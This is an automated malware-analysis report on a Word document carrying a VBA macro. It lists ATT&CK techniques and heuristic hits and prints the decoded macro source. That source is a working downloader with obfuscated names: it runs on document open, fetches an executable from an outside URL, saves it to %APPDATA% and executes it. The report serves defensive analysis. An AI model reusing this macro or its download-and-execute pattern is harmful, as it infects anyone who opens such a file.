MALICIOUS
98
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1105 Ingress Tool Transfer
T1203 Exploitation for Client Execution
The sample contains a VBA macro with a Document_Open auto-execution subroutine. This macro utilizes URLDownloadToFileW to download a second-stage executable from http://firefly.fireflyproduce.xyz/install/data/test1.exe and saves it as %APPDATA%\test.exe. Subsequently, it uses ShellExecuteW to execute the downloaded file, indicating a downloader or dropper functionality.
Heuristics 5
-
VBA project inside OOXML medium 3 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
URLDownloadToFile in VBA critical OLE_VBA_DOWNLOADURLDownloadToFile in VBAMatched line in script
'Macro Name: wWefqPnB Private Declare Function bSMADket Lib "urlmon" Alias "URLDownloadToFileW" (ByVal GNtVQFWk As Long, ByVal lIbqcaOc As Long, ByVal eZSbThdG As Long, ByVal JUAwgCUx As Long, ByVal pQiRtXMp As Long) As Long Private Declare Function ULPlGsEh Lib "shell32.dll" Alias "ShellExecuteW" (ByVal zGxGTNvZ As Long, ByVal sXorKUKC As Long, ByVal XSWMXpCu As Long, ByVal COEhkKtm As Long, ByVal hJlCxfld As Long, ByVal METXKAdV As Long) As Long -
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Attribute VB_Customizable = True Private Sub Document_Open() wWefqPnB -
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)Matched line in script
FVKIBHsz = "http://firefly.fireflyproduce.xyz/install/data/test1.exe" kQscOcjq = Environ("APPDATA") & "\test.exe" Call bSMADket(0, StrPtr(FVKIBHsz), StrPtr(kQscOcjq), 0, 0) -
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://firefly.fireflyproduce.xyz/install/data/test1.exe Referenced by macro
- http://schemas.openxmlformats.org/markup-compatibility/2006Referenced by macro
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsReferenced by macro
- http://schemas.openxmlformats.org/officeDocument/2006/mathReferenced by macro
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingReferenced by macro
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainReferenced by macro
- http://schemas.microsoft.com/office/word/2006/wordmlReferenced by macro
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 1199 bytes |
SHA-256: c11e1f769b88ac2f702fc508ab8ce0d53da5570766c75d2948271c0e0d8f1e2b |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
wWefqPnB
End Sub
Attribute VB_Name = "Module1"
Option Explicit
'Macro Name: wWefqPnB
Private Declare Function bSMADket Lib "urlmon" Alias "URLDownloadToFileW" (ByVal GNtVQFWk As Long, ByVal lIbqcaOc As Long, ByVal eZSbThdG As Long, ByVal JUAwgCUx As Long, ByVal pQiRtXMp As Long) As Long
Private Declare Function ULPlGsEh Lib "shell32.dll" Alias "ShellExecuteW" (ByVal zGxGTNvZ As Long, ByVal sXorKUKC As Long, ByVal XSWMXpCu As Long, ByVal COEhkKtm As Long, ByVal hJlCxfld As Long, ByVal METXKAdV As Long) As Long
Public Sub wWefqPnB()
Dim FVKIBHsz As String, kQscOcjq As String
FVKIBHsz = "http://firefly.fireflyproduce.xyz/install/data/test1.exe"
kQscOcjq = Environ("APPDATA") & "\test.exe"
Call bSMADket(0, StrPtr(FVKIBHsz), StrPtr(kQscOcjq), 0, 0)
Call ULPlGsEh(0, StrPtr("Open"), StrPtr(kQscOcjq), 0, 0, 1)
End Sub
Private Sub Document_Open()
wWefqPnB
End Sub
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: word/vbaProject.bin | 11776 bytes |
SHA-256: 551affe3abb05c04429907bb3cd926889084a4f97c75446f5471118565d366ac |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.